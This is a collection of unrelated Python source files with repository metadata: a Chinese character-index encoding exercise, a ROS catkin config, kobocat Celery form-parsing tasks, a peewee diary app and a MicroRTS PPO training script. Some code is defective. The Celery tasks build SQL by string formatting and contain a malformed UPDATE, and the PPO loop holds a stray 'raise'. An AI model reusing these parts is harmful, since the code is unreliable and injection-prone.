print(re.findall(reg, html_result.text))
# hans_list 当中就是包含了我们想要的2500个常用汉字
hans_list = re.findall(reg, html_result.text)
print(hans_list)
# 我要加密的字符串
input_message = "Hello,我来学院学习"
# 我要存储加密完成的字符串
result = ""
''''
加密规则:
到hans_list中去寻找我输入的汉字,并将其位置取出来,
作为加密后的编号,并且使用| 把这些组的数字分开
例如: 我爱中国 加密为 29|30|12|24|
'''
for hans in input_message:
for index, element in enumerate(hans_list):
if hans == element:
print(index)
# print(element)
result += str(index) + "|"
print("加密后的数据>>>>" + result)
# 这里使用
index_list = result.split("|")
# print(index_list)
# 移除数据后的空元素
index_list.remove("")
# print(index_list)
# 声明一个变量用来存放解密后的结果
response_result = ""
# 遍历我的数组
for index in index_list:
# 数组中的字符串转上int值
int_index = int(index)
response_result += hans_list[int_index]
print("解密后的数据>>>>" + response_result)
'''
print(ord('我'))
自己写一个加密程序,能够加密的内容是英文和汉字,同时加密并且解密
就是说,一段话中既有中文又有英文,标点符号不用处理
加密规则,获取ASCii码数字,中间用|分割
扩展内容:自定义规则玩起来
预习内容:
下载neo4j数据库,并学会简单的cypher语句。什么版本都行
'''
|
[
"740792225@qq.com"
] |
740792225@qq.com
|
1e7d3b7390fc94b7c2e696a74b0633d2085130fd
|
62063bd79b948aeae85c50ae2e64b2d6d77a2461
|
/catkin_ws/build/Bieke/src/imu/timesync_ros/catkin_generated/pkg.installspace.context.pc.py
|
586a11b3064a02c71c08820f02fa51a849177835
|
[] |
no_license
|
PanHongYang/Vehicle-sensing-system
|
978dc550baa1a11838045700efc6dbd0b70f7929
|
2720fef36f5c7ad8fbc6480dffdfe7e9cef6e416
|
refs/heads/main
| 2023-06-04T07:00:50.785549
| 2021-06-19T07:43:38
| 2021-06-19T07:43:38
| 378,354,624
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 463
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include".split(';') if "${prefix}/include" != "" else []
PROJECT_CATKIN_DEPENDS = "dynamic_reconfigure;roscpp;message_runtime".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-ltimesync".split(';') if "-ltimesync" != "" else []
PROJECT_NAME = "timesync"
PROJECT_SPACE_DIR = "/home/a/catkin_ws/install"
PROJECT_VERSION = "1.0.0"
|
[
"36400535+PanHongYang@users.noreply.github.com"
] |
36400535+PanHongYang@users.noreply.github.com
|
f9b0e6b57b30524e0a3d3f85b1cdc4802288266e
|
ff29c013c24068e7409340ba1cd5b88cf3e82436
|
/kobocat/onadata/libs/tasks.py
|
7edd3faeef8e7d4a7fe8059abdb5aec4c47d82c6
|
[
"BSD-2-Clause"
] |
permissive
|
Jubair70/Acid-Survivors-MIS
|
01c64a0589e5ed275d9f1a9cf5973303ea4b937e
|
89f19607d18a6d4c88717527e2e8d557aaec2fa9
|
refs/heads/master
| 2021-05-26T11:26:34.503102
| 2019-08-26T10:38:59
| 2019-08-26T10:38:59
| 254,112,228
| 1
| 0
| null | 2020-04-08T14:53:52
| 2020-04-08T14:33:00
|
HTML
|
UTF-8
|
Python
| false
| false
| 10,820
|
py
|
__author__ = "Md Shiam Shabbir"
import os
import json
from django.db import connection
from django.shortcuts import get_object_or_404
from django.contrib.auth.models import User
from onadata.apps.logger.models import Instance, XForm
from celery import task
from celery.decorators import task
#from onadata.apps.main.database_utility import db_fetch_values, single_query, update_table
from datetime import timedelta
from celery.task.schedules import crontab
from celery.decorators import periodic_task
questionsDict = {}
groupNameList = []
'''
Tup related asyn process
@zinia
'''
def update_table(query):
try:
print query
# create a new cursor
cur = connection.cursor()
# execute the UPDATE statement
cur.execute(query)
# get the number of updated rows
vendor_id = cur.fetchone()[0]
print vendor_id
# Commit the changes to the database_
connection.commit()
# Close communication with the PostgreSQL database
cur.close()
except (Exception) as error:
print(error)
finally:
if connection is not None:
connection.close()
def single_query(query):
"""function for query where result is single"""
fetchVal = db_fetch_values(query)
if len(fetchVal) == 0:
return None
strType = map(str, fetchVal[0])
ans = strType[0]
return ans
def db_fetch_values(query):
"""
Fetch database result set as list of tuples
Args:
query (str): raw query string
Returns:
str: Returns database result set as list of tuples
"""
cursor = CONNECTION.cursor()
cursor.execute(query)
fetch_val = cursor.fetchall()
cursor.close()
return fetch_val
@periodic_task(run_every=timedelta(seconds=10),name="populate_table_queue")
def queue_info_insert():
print "#####################task enter###################"
'''Getting all new instance in the queue '''
try:
instance_query = "select id, instance_id, xform_id from instance_queue where status='new'"
instance_queue = db_fetch_values(instance_query)
print 'inside'
'''calling procedure according form_id '''
for each in instance_queue:
function_query = 'select function_name from form_function where form_id =%s'%(each[2])
form_function = single_query(function_query)
if form_function is not None:
insert_data_query = "select %s(%s)"%(form_function,each[1])
result = single_query(insert_data_query)
if result == '0':
print 'update'
update_instance = "update instance_queue set status='old' and updated_at = now() where instance_id = %s"%(each[1])
update_table(update_instance)
except Exception, e:
print "db get error"
print str(e)
print "#####################task exit###################"
class Question:
"""This class represents a question object which stores
question name,question type and question label if exists."""
name = ''
question_type = ''
question_label = ''
def __init__(self, q_name,q_type,q_label):
self.name = q_name
self.question_type = q_type
self.question_label = q_label
def getQuestion_name(self):
return str(self.name)
def getQuestion_type(self):
return str(self.question_type)
def getQuestion_label(self):
return str(self.question_label)
@task()
def instance_parse():
#print 'success'
json_instances = get_instance_info()
parsed_json = json.loads(json_instances)
print parsed_json
for key in parsed_json:
questionsDict.clear()
del groupNameList[:]
try:
username = parsed_json[key]['username']
id_string = parsed_json[key]['xform_id_string']
json_q_data = json.loads(get_form_json(username,id_string))
#print json_data['children']
question_parsed = parseQuestions(json_q_data['children'],'',None)
if question_parsed:
json_instance_data = get_form_instance_data(username,id_string,int(key))
if json_instance_data is not None:
process_data_and_save(json_instance_data,username,id_string,int(key))
except Exception as e:
print e
def get_instance_info():
cursor = connection.cursor()
query = "select instance_to_parse.form_id_string,instance_to_parse.form_instance_id,instance_to_parse.form_id_int from instance_to_parse where is_new=TRUE "
#in (select instance_id from approval_instanceapproval where status like 'Approved')
try:
cursor.execute(query)
form_informations = cursor.fetchall()
rowcount = cursor.rowcount
except Exception as e:
print e
connection.rollback()
form_info_json = {}
#print form_informations
for info in form_informations:
data={}
form_id = int(info[2])
#print form_id
try:
xform = get_object_or_404(XForm, pk=form_id)
user_id = xform.user_id
owner = get_object_or_404(User, pk=user_id)
data['username'] = str(owner.username)
data['xform_id_string'] = str(xform.id_string)
form_info_json[str(info[1])] = data
except Exception as e:
print e
connection.rollback()
#print owner.username
cursor.close()
return json.dumps(form_info_json)
def get_form_json(username,id_string):
owner = get_object_or_404(User, username__iexact=username)
xform = get_object_or_404(XForm, user__username__iexact=username,
id_string__exact=id_string)
return xform.json
def parseQuestions(children,prefix,cleanReplacement):
idx = 0
if cleanReplacement is None:
cleanReplacement = '_'
for idx in range(len(children)):
question = children[idx]
q_name = question.get('name',None)
q_type = question.get('type',None)
q_label = question.get('label',None)
sub_children = question.get('children',None)
#print sub_children
if (sub_children is not None and (q_type == 'repeat' or q_type == 'group' or q_type == 'note')):
#print sub_children
groupNameList.append(str(q_name))
#print '####Group_q_name: '+str(q_name)
parseQuestions(question['children'],''+q_name+cleanReplacement,None)
else:
if prefix is not None:
questionsDict[str(prefix)+str(q_name)] = Question(q_name,q_type,q_label if q_label is not None else '')
else:
questionsDict[str(q_name)] = Question(q_name,q_type,q_label if q_label is not None else '')
#print str(groupNameList)
'''for key in questionsDict:
print questionsDict[key].getQuestion_name()'''
return True
def get_form_instance_data(username, id_string, instance_id):
#print instance_id
instance = None
try:
xform = get_object_or_404(XForm, user__username__iexact=username, id_string__exact=id_string)
instance = get_object_or_404(Instance, id=instance_id)
except Exception as e:
print e
return instance.json
def process_data_and_save(data,username,id_string,instance_id):
questionWithVal = {}
cleanRe = '/[\[\]\/]/g'
cleanReplacement = '_'
if data is not None:
cleanData = {}
print ('Data is currently Processing and trying to save...... ')
for key in data:
test_bool = False
q_value = data[key]
if any(grp_name in key for grp_name in groupNameList):
try:
isinst = isinstance(q_value, list)
if isinst:
# print '########################################'
for each in q_value:
for sub_key, value in each.iteritems():
#print sub_key,value
cleanKey = sub_key.replace('/','_')
if str(cleanKey) in cleanData:
cleanData[str(cleanKey)] += ','+ value.encode('utf8')
else:
cleanData[str(cleanKey)] = value.encode('utf8')
#print str(q_value)
else:
cleanKey = str(key).replace('/','_')
#print 'cleanKey: '+ str(cleanKey)
cleanData[str(cleanKey)] = q_value.encode('utf8')
test_bool = True
except Exception as e:
print e
#print str(key).split('/')[1]
#print 'matched'
else:
cleanKey = key.replace(cleanRe,cleanReplacement)
test_bool = False
cleanData[str(cleanKey)] = q_value.encode('utf8')
# if test_bool is True:
# print str(cleanData)
for q_key in questionsDict:
#print q_key
value = {}
ques_name = q_key
ques_label = questionsDict[q_key].getQuestion_label()
ques_type = questionsDict[q_key].getQuestion_type()
ques_value = cleanData.get(q_key,None)
value.update({
'question_label': str(ques_label),
'question_type' : str(ques_type),
'question_value' : str(ques_value)
})
if ques_value is not None:
questionWithVal[ques_name] = value
#value.clear()
try:
cursor = connection.cursor()
for key in questionWithVal:
group_name = ''
#print questionWithVal.get(key,None)
if 'question_group' in questionWithVal[key]:
group_name = str(questionWithVal[key]['question_group'])
cursor.execute("BEGIN")
cursor.callproc("set_instance_parse_data",(str(id_string),int(instance_id),str(key),json.dumps(questionWithVal[key])))
cursor.execute("COMMIT")
update_is_new_query = "UPDATE public.instance_to_parse SET is_new = FALSE WHERE form_instance_id = "+str(instance_id)
cursor.execute(update_is_new_query)
#print update_is_new_query
cursor.close()
except Exception as e:
print e
# Open a file
#fo = open("q_dict.txt", "wb")
#fo.write( str(questionWithVal));
# Close opend file
#fo.close()
#print str(questionWithVal)
|
[
"jubair@mpower-social.com"
] |
jubair@mpower-social.com
|
40325fc0db4ad916152b5e05cc2ddac1ad359549
|
e46060998dbdf09a152f54a311708d357885ec28
|
/treehouse/Using Databases in Python - Modeling/diary.py
|
ecb4d71cfbb0c5c19508c267e4998fd68c92adb5
|
[] |
no_license
|
GabrielaLBazan/nfad2
|
cc03d4b528388a33d7047330c943aefb45e81499
|
b89fe8e606c4ca4f0cc2f7cb5ea6934c8eb078e0
|
refs/heads/master
| 2020-05-29T22:34:15.293023
| 2017-08-22T23:30:26
| 2017-08-22T23:30:26
| 82,612,707
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,448
|
py
|
#!/usr/bin/env python3
from collections import OrderedDict
import datetime
import os
import sys
from peewee import *
db = SqliteDatabase('diary.db')
class Entry(Model):
content = TextField()
timestamp = DateTimeField(default=datetime.datetime.now)
class Meta:
database = db
def initialize():
"""Create the database and the table if they don't exist."""
db.connect()
db.create_tables([Entry], safe=True)
def clear():
os.system('cls' if os.name == 'nt' else 'clear')
def menu_loop():
"""Show the menu"""
choice = None
while choice != 'q':
clear()
print("Enter 'q' to quit.")
for key, value in menu.items():
print('{}) {}'.format(key, value.__doc__))
choice = input('Action: ').lower().strip()
if choice in menu:
clear()
menu[choice]()
def add_entry():
"""Add an entry."""
print("Enter your entry. Press ctrl+d when finished.")
data = sys.stdin.read().strip()
if data:
if input('Save entry? [Yn] ').lower() != 'n':
Entry.create(content=data)
print("Saved successfully!")
def view_entries(search_query=None):
"""View previous entries."""
entries = Entry.select().order_by(Entry.timestamp.desc())
if search_query:
entries = entries.where(Entry.content.contains(search_query))
for entry in entries:
timestamp = entry.timestamp.strftime('%A %B %d, %Y %I:%M%p')
clear()
print(timestamp)
print('='*len(timestamp))
print(entry.content)
print('\n\n'+'='*len(timestamp))
print('n) next entry')
print('d) delete entry')
print('q) return to main menu')
next_action = input('Action: [Ndq] ').lower().strip()
if next_action == 'q':
break
elif next_action == 'd':
delete_entry(entry)
def search_entries():
"""Search entries for a string."""
view_entries(input('Search query: '))
def delete_entry(entry):
"""Delete an entry."""
if input("Are you sure? [yN] ").lower() == 'y':
entry.delete_instance()
print("Entry deleted")
menu = OrderedDict([
('a', add_entry),
('v', view_entries),
('s', search_entries),
])
if __name__ == '__main__':
initialize()
menu_loop()
|
[
"github@gabrielabazan.com"
] |
github@gabrielabazan.com
|
b9f0f7778bb25c82cc5db46b9da0d0480c6ae359
|
5b4fc401c25e83f62eafd88b76b5c7f19f94f6c8
|
/experiments/historic_scripts/ppo_partial_autoregressive.py
|
96f893613c8e3222750b44165b7909b2ac867032
|
[] |
no_license
|
sigvol/gym-microrts
|
5efc311ad2c0f31d997fcb8ae0f98e71d72fb89d
|
63ea1278b2b11e8369288ccbc47398d3310a4fec
|
refs/heads/master
| 2023-05-15T10:24:44.403280
| 2021-06-15T20:58:34
| 2021-06-15T20:58:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 22,594
|
py
|
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.distributions.categorical import Categorical
from torch.utils.tensorboard import SummaryWriter
import argparse
from distutils.util import strtobool
import numpy as np
import gym
import gym_microrts
from gym.wrappers import TimeLimit, Monitor
from gym.spaces import Discrete, Box, MultiBinary, MultiDiscrete, Space
import time
import random
import os
from stable_baselines3.common.vec_env import DummyVecEnv, SubprocVecEnv, VecEnvWrapper
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='PPO agent')
# Common arguments
parser.add_argument('--exp-name', type=str, default=os.path.basename(__file__).rstrip(".py"),
help='the name of this experiment')
parser.add_argument('--gym-id', type=str, default="MicrortsDefeatWorkerRushEnemyShaped-v3",
help='the id of the gym environment')
parser.add_argument('--learning-rate', type=float, default=2.5e-4,
help='the learning rate of the optimizer')
parser.add_argument('--seed', type=int, default=1,
help='seed of the experiment')
parser.add_argument('--total-timesteps', type=int, default=10000000,
help='total timesteps of the experiments')
parser.add_argument('--torch-deterministic', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='if toggled, `torch.backends.cudnn.deterministic=False`')
parser.add_argument('--cuda', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='if toggled, cuda will not be enabled by default')
parser.add_argument('--prod-mode', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='run the script in production mode and use wandb to log outputs')
parser.add_argument('--capture-video', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='weather to capture videos of the agent performances (check out `videos` folder)')
parser.add_argument('--wandb-project-name', type=str, default="cleanRL",
help="the wandb's project name")
parser.add_argument('--wandb-entity', type=str, default=None,
help="the entity (team) of wandb's project")
# Algorithm specific arguments
parser.add_argument('--n-minibatch', type=int, default=4,
help='the number of mini batch')
parser.add_argument('--num-envs', type=int, default=4,
help='the number of parallel game environment')
parser.add_argument('--num-steps', type=int, default=128,
help='the number of steps per game environment')
parser.add_argument('--gamma', type=float, default=0.99,
help='the discount factor gamma')
parser.add_argument('--gae-lambda', type=float, default=0.95,
help='the lambda for the general advantage estimation')
parser.add_argument('--ent-coef', type=float, default=0.01,
help="coefficient of the entropy")
parser.add_argument('--vf-coef', type=float, default=0.5,
help="coefficient of the value function")
parser.add_argument('--max-grad-norm', type=float, default=0.5,
help='the maximum norm for the gradient clipping')
parser.add_argument('--clip-coef', type=float, default=0.1,
help="the surrogate clipping coefficient")
parser.add_argument('--update-epochs', type=int, default=4,
help="the K epochs to update the policy")
parser.add_argument('--kle-stop', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='If toggled, the policy updates will be early stopped w.r.t target-kl')
parser.add_argument('--kle-rollback', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='If toggled, the policy updates will roll back to previous policy if KL exceeds target-kl')
parser.add_argument('--target-kl', type=float, default=0.03,
help='the target-kl variable that is referred by --kl')
parser.add_argument('--gae', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='Use GAE for advantage computation')
parser.add_argument('--norm-adv', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help="Toggles advantages normalization")
parser.add_argument('--anneal-lr', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help="Toggle learning rate annealing for policy and value networks")
parser.add_argument('--clip-vloss', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='Toggles wheter or not to use a clipped loss for the value function, as per the paper.')
args = parser.parse_args()
if not args.seed:
args.seed = int(time.time())
args.batch_size = int(args.num_envs * args.num_steps)
args.minibatch_size = int(args.batch_size // args.n_minibatch)
class ImageToPyTorch(gym.ObservationWrapper):
def __init__(self, env):
super(ImageToPyTorch, self).__init__(env)
old_shape = self.observation_space.shape
self.observation_space = gym.spaces.Box(
low=0,
high=1,
shape=(old_shape[-1], old_shape[0], old_shape[1]),
dtype=np.int32,
)
def observation(self, observation):
return np.transpose(observation, axes=(2, 0, 1))
class VecPyTorch(VecEnvWrapper):
def __init__(self, venv, device):
super(VecPyTorch, self).__init__(venv)
self.device = device
def reset(self):
obs = self.venv.reset()
obs = torch.from_numpy(obs).float().to(self.device)
return obs
def step_async(self, actions):
actions = actions.cpu().numpy()
self.venv.step_async(actions)
def step_wait(self):
obs, reward, done, info = self.venv.step_wait()
obs = torch.from_numpy(obs).float().to(self.device)
reward = torch.from_numpy(reward).unsqueeze(dim=1).float()
return obs, reward, done, info
class MicroRTSStatsRecorder(gym.Wrapper):
def reset(self, **kwargs):
observation = super(MicroRTSStatsRecorder, self).reset(**kwargs)
self.raw_rewards = []
return observation
def step(self, action):
observation, reward, done, info = super(MicroRTSStatsRecorder, self).step(action)
self.raw_rewards += [info["raw_rewards"]]
if done:
raw_rewards = np.array(self.raw_rewards).sum(0)
raw_names = [str(rf) for rf in self.rfs]
info['microrts_stats'] = dict(zip(raw_names, raw_rewards))
self.raw_rewards = []
return observation, reward, done, info
# TRY NOT TO MODIFY: setup the environment
experiment_name = f"{args.gym_id}__{args.exp_name}__{args.seed}__{int(time.time())}"
writer = SummaryWriter(f"runs/{experiment_name}")
writer.add_text('hyperparameters', "|param|value|\n|-|-|\n%s" % (
'\n'.join([f"|{key}|{value}|" for key, value in vars(args).items()])))
if args.prod_mode:
import wandb
run = wandb.init(
project=args.wandb_project_name, entity=args.wandb_entity,
# sync_tensorboard=True,
config=vars(args), name=experiment_name, monitor_gym=True, save_code=True)
wandb.tensorboard.patch(save=False)
writer = SummaryWriter(f"/tmp/{experiment_name}")
CHECKPOINT_FREQUENCY = 50
# TRY NOT TO MODIFY: seeding
device = torch.device('cuda' if torch.cuda.is_available() and args.cuda else 'cpu')
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.backends.cudnn.deterministic = args.torch_deterministic
def make_env(gym_id, seed, idx):
def thunk():
env = gym.make(gym_id)
env = gym.wrappers.RecordEpisodeStatistics(env)
env = MicroRTSStatsRecorder(env)
env = ImageToPyTorch(env)
if args.capture_video:
if idx == 0:
env = Monitor(env, f'videos/{experiment_name}')
env.seed(seed)
env.action_space.seed(seed)
env.observation_space.seed(seed)
return env
return thunk
envs = VecPyTorch(DummyVecEnv([make_env(args.gym_id, args.seed+i, i) for i in range(args.num_envs)]), device)
# if args.prod_mode:
# envs = VecPyTorch(
# SubprocVecEnv([make_env(args.gym_id, args.seed+i, i) for i in range(args.num_envs)], "fork"),
# device
# )
assert isinstance(envs.action_space, MultiDiscrete), "only MultiDiscrete action space is supported"
# ALGO LOGIC: initialize agent here:
class CategoricalMasked(Categorical):
def __init__(self, probs=None, logits=None, validate_args=None, masks=[]):
self.masks = masks
if len(self.masks) == 0:
super(CategoricalMasked, self).__init__(probs, logits, validate_args)
else:
self.masks = masks.type(torch.BoolTensor).to(device)
logits = torch.where(self.masks, logits, torch.tensor(-1e+8).to(device))
super(CategoricalMasked, self).__init__(probs, logits, validate_args)
def entropy(self):
if len(self.masks) == 0:
return super(CategoricalMasked, self).entropy()
p_log_p = self.logits * self.probs
p_log_p = torch.where(self.masks, p_log_p, torch.tensor(0.).to(device))
return -p_log_p.sum(-1)
class Scale(nn.Module):
def __init__(self, scale):
super().__init__()
self.scale = scale
def forward(self, x):
return x * self.scale
def layer_init(layer, std=np.sqrt(2), bias_const=0.0):
torch.nn.init.orthogonal_(layer.weight, std)
torch.nn.init.constant_(layer.bias, bias_const)
return layer
class Agent(nn.Module):
def __init__(self, frames=4):
super(Agent, self).__init__()
self.network = nn.Sequential(
layer_init(nn.Conv2d(27, 16, kernel_size=3, stride=2)),
nn.ReLU(),
layer_init(nn.Conv2d(16, 32, kernel_size=2)),
nn.ReLU(),
nn.Flatten(),
layer_init(nn.Linear(32*6*6, 256)),
nn.ReLU(),)
self.critic_head = layer_init(nn.Linear(256, 1), std=1)
map_size = 16*16
self.actor_source_unit_head = layer_init(nn.Linear(256, envs.action_space.nvec[0]), std=0.01)
self.actor_source_unit_embeddings = layer_init(nn.Linear(map_size, 256), std=0.01)
self.actor_others_head = layer_init(nn.Linear(256+envs.action_space.nvec[0], envs.action_space.nvec[1:].sum()), std=0.01)
def forward(self, x):
return self.network(x)
def get_action(self, x, action=None, invalid_action_masks=None, envs=None):
hidden_output = self.forward(x)
su_logits = self.actor_source_unit_head(hidden_output)
if action is None:
# 1. select source unit based on source unit mask
source_unit_mask = torch.Tensor(np.array(envs.env_method("get_unit_location_mask", player=1)))
multi_categoricals = [CategoricalMasked(logits=su_logits, masks=source_unit_mask)]
action_components = [multi_categoricals[0].sample()]
# 2. select action type and parameter section based on the
# source-unit mask of action type and parameters
source_unit_action_mask = torch.Tensor(
[envs.env_method("get_unit_action_mask", unit=action_components[0][i].item(), player=1, indices=i)[0]
for i in range(envs.num_envs)])
source_unit_embedding = F.one_hot(action_components[0], envs.action_space.nvec[0])
other_logits = self.actor_others_head(torch.cat((hidden_output, source_unit_embedding), 1))
split_logits = torch.split(other_logits, envs.action_space.nvec[1:].tolist(), dim=1)
split_suam = torch.split(source_unit_action_mask, envs.action_space.nvec.tolist()[1:], dim=1)
multi_categoricals = multi_categoricals + [CategoricalMasked(logits=logits, masks=iam) for (logits, iam) in zip(split_logits, split_suam)]
for categorical in multi_categoricals[1:]:
action_components += [categorical.sample()]
invalid_action_masks = torch.cat((source_unit_mask, source_unit_action_mask), 1)
action = torch.stack(action_components)
else:
split_invalid_action_masks = torch.split(invalid_action_masks, envs.action_space.nvec.tolist(), dim=1)
multi_categoricals = [CategoricalMasked(logits=su_logits, masks=split_invalid_action_masks[0])]
source_unit_embedding = F.one_hot(action[0], envs.action_space.nvec[0])
other_logits = self.actor_others_head(torch.cat((hidden_output, source_unit_embedding), 1))
split_logits = torch.split(other_logits, envs.action_space.nvec[1:].tolist(), dim=1)
multi_categoricals = multi_categoricals + [CategoricalMasked(logits=logits, masks=iam) for (logits, iam) in zip(split_logits, split_invalid_action_masks[1:])]
# multi_categoricals = [CategoricalMasked(logits=logits, masks=iam) for (logits, iam) in zip(split_logits, split_invalid_action_masks)]
logprob = torch.stack([categorical.log_prob(a) for a, categorical in zip(action, multi_categoricals)])
entropy = torch.stack([categorical.entropy() for categorical in multi_categoricals])
return action, logprob.sum(0), entropy.sum(0), invalid_action_masks
def get_value(self, x):
return self.critic_head(self.forward(x))
agent = Agent().to(device)
optimizer = optim.Adam(agent.parameters(), lr=args.learning_rate, eps=1e-5)
if args.anneal_lr:
# https://github.com/openai/baselines/blob/ea25b9e8b234e6ee1bca43083f8f3cf974143998/baselines/ppo2/defaults.py#L20
lr = lambda f: f * args.learning_rate
# ALGO Logic: Storage for epoch data
obs = torch.zeros((args.num_steps, args.num_envs) + envs.observation_space.shape).to(device)
actions = torch.zeros((args.num_steps, args.num_envs) + envs.action_space.shape).to(device)
logprobs = torch.zeros((args.num_steps, args.num_envs)).to(device)
rewards = torch.zeros((args.num_steps, args.num_envs)).to(device)
dones = torch.zeros((args.num_steps, args.num_envs)).to(device)
values = torch.zeros((args.num_steps, args.num_envs)).to(device)
invalid_action_masks = torch.zeros((args.num_steps, args.num_envs) + (envs.action_space.nvec.sum(),)).to(device)
# TRY NOT TO MODIFY: start the game
global_step = 0
# Note how `next_obs` and `next_done` are used; their usage is equivalent to
# https://github.com/ikostrikov/pytorch-a2c-ppo-acktr-gail/blob/84a7582477fb0d5c82ad6d850fe476829dddd2e1/a2c_ppo_acktr/storage.py#L60
next_obs = envs.reset()
next_done = torch.zeros(args.num_envs).to(device)
num_updates = args.total_timesteps // args.batch_size
## CRASH AND RESUME LOGIC:
starting_update = 1
if args.prod_mode and wandb.run.resumed:
starting_update = run.summary.get('charts/update') + 1
global_step = starting_update * args.batch_size
api = wandb.Api()
run = api.run(f"{run.entity}/{run.project}/{run.id}")
model = run.file('agent.pt')
model.download(f"models/{experiment_name}/")
agent.load_state_dict(torch.load(f"models/{experiment_name}/agent.pt", map_location=device))
agent.eval()
print(f"resumed at update {starting_update}")
for update in range(starting_update, num_updates+1):
# Annealing the rate if instructed to do so.
if args.anneal_lr:
frac = 1.0 - (update - 1.0) / num_updates
lrnow = lr(frac)
optimizer.param_groups[0]['lr'] = lrnow
# TRY NOT TO MODIFY: prepare the execution of the game.
for step in range(0, args.num_steps):
envs.env_method("render", indices=0)
global_step += 1 * args.num_envs
obs[step] = next_obs
dones[step] = next_done
raise
# ALGO LOGIC: put action logic here
with torch.no_grad():
values[step] = agent.get_value(obs[step]).flatten()
action, logproba, _, invalid_action_masks[step] = agent.get_action(obs[step], envs=envs)
actions[step] = action.T
logprobs[step] = logproba
# TRY NOT TO MODIFY: execute the game and log data.
next_obs, rs, ds, infos = envs.step(action.T)
rewards[step], next_done = rs.view(-1), torch.Tensor(ds).to(device)
for info in infos:
if 'episode' in info.keys():
print(f"global_step={global_step}, episode_reward={info['episode']['r']}")
writer.add_scalar("charts/episode_reward", info['episode']['r'], global_step)
for key in info['microrts_stats']:
writer.add_scalar(f"charts/episode_reward/{key}", info['microrts_stats'][key], global_step)
break
# bootstrap reward if not done. reached the batch limit
with torch.no_grad():
last_value = agent.get_value(next_obs.to(device)).reshape(1, -1)
if args.gae:
advantages = torch.zeros_like(rewards).to(device)
lastgaelam = 0
for t in reversed(range(args.num_steps)):
if t == args.num_steps - 1:
nextnonterminal = 1.0 - next_done
nextvalues = last_value
else:
nextnonterminal = 1.0 - dones[t+1]
nextvalues = values[t+1]
delta = rewards[t] + args.gamma * nextvalues * nextnonterminal - values[t]
advantages[t] = lastgaelam = delta + args.gamma * args.gae_lambda * nextnonterminal * lastgaelam
returns = advantages + values
else:
returns = torch.zeros_like(rewards).to(device)
for t in reversed(range(args.num_steps)):
if t == args.num_steps - 1:
nextnonterminal = 1.0 - next_done
next_return = last_value
else:
nextnonterminal = 1.0 - dones[t+1]
next_return = returns[t+1]
returns[t] = rewards[t] + args.gamma * nextnonterminal * next_return
advantages = returns - values
# flatten the batch
b_obs = obs.reshape((-1,)+envs.observation_space.shape)
b_logprobs = logprobs.reshape(-1)
b_actions = actions.reshape((-1,)+envs.action_space.shape)
b_advantages = advantages.reshape(-1)
b_returns = returns.reshape(-1)
b_values = values.reshape(-1)
b_invalid_action_masks = invalid_action_masks.reshape((-1, invalid_action_masks.shape[-1]))
# Optimizaing the policy and value network
target_agent = Agent().to(device)
inds = np.arange(args.batch_size,)
for i_epoch_pi in range(args.update_epochs):
np.random.shuffle(inds)
target_agent.load_state_dict(agent.state_dict())
for start in range(0, args.batch_size, args.minibatch_size):
end = start + args.minibatch_size
minibatch_ind = inds[start:end]
mb_advantages = b_advantages[minibatch_ind]
if args.norm_adv:
mb_advantages = (mb_advantages - mb_advantages.mean()) / (mb_advantages.std() + 1e-8)
_, newlogproba, entropy, _ = agent.get_action(
b_obs[minibatch_ind],
b_actions.long()[minibatch_ind].T,
b_invalid_action_masks[minibatch_ind],
envs)
ratio = (newlogproba - b_logprobs[minibatch_ind]).exp()
# Stats
approx_kl = (b_logprobs[minibatch_ind] - newlogproba).mean()
# Policy loss
pg_loss1 = -mb_advantages * ratio
pg_loss2 = -mb_advantages * torch.clamp(ratio, 1-args.clip_coef, 1+args.clip_coef)
pg_loss = torch.max(pg_loss1, pg_loss2).mean()
entropy_loss = entropy.mean()
# Value loss
new_values = agent.get_value(b_obs[minibatch_ind]).view(-1)
if args.clip_vloss:
v_loss_unclipped = ((new_values - b_returns[minibatch_ind]) ** 2)
v_clipped = b_values[minibatch_ind] + torch.clamp(new_values - b_values[minibatch_ind], -args.clip_coef, args.clip_coef)
v_loss_clipped = (v_clipped - b_returns[minibatch_ind])**2
v_loss_max = torch.max(v_loss_unclipped, v_loss_clipped)
v_loss = 0.5 * v_loss_max.mean()
else:
v_loss = 0.5 *((new_values - b_returns[minibatch_ind]) ** 2)
loss = pg_loss - args.ent_coef * entropy_loss + v_loss * args.vf_coef
optimizer.zero_grad()
loss.backward()
nn.utils.clip_grad_norm_(agent.parameters(), args.max_grad_norm)
optimizer.step()
if args.kle_stop:
if approx_kl > args.target_kl:
break
if args.kle_rollback:
if (b_logprobs[minibatch_ind] - agent.get_action(
b_obs[minibatch_ind],
b_actions.long()[minibatch_ind].T,
b_invalid_action_masks[minibatch_ind],
envs)[1]).mean() > args.target_kl:
agent.load_state_dict(target_agent.state_dict())
break
## CRASH AND RESUME LOGIC:
if args.prod_mode:
if not os.path.exists(f"models/{experiment_name}"):
os.makedirs(f"models/{experiment_name}")
torch.save(agent.state_dict(), f"{wandb.run.dir}/agent.pt")
wandb.save(f"agent.pt")
else:
if update % CHECKPOINT_FREQUENCY == 0:
torch.save(agent.state_dict(), f"{wandb.run.dir}/agent.pt")
# TRY NOT TO MODIFY: record rewards for plotting purposes
writer.add_scalar("charts/learning_rate", optimizer.param_groups[0]['lr'], global_step)
writer.add_scalar("charts/update", update, global_step)
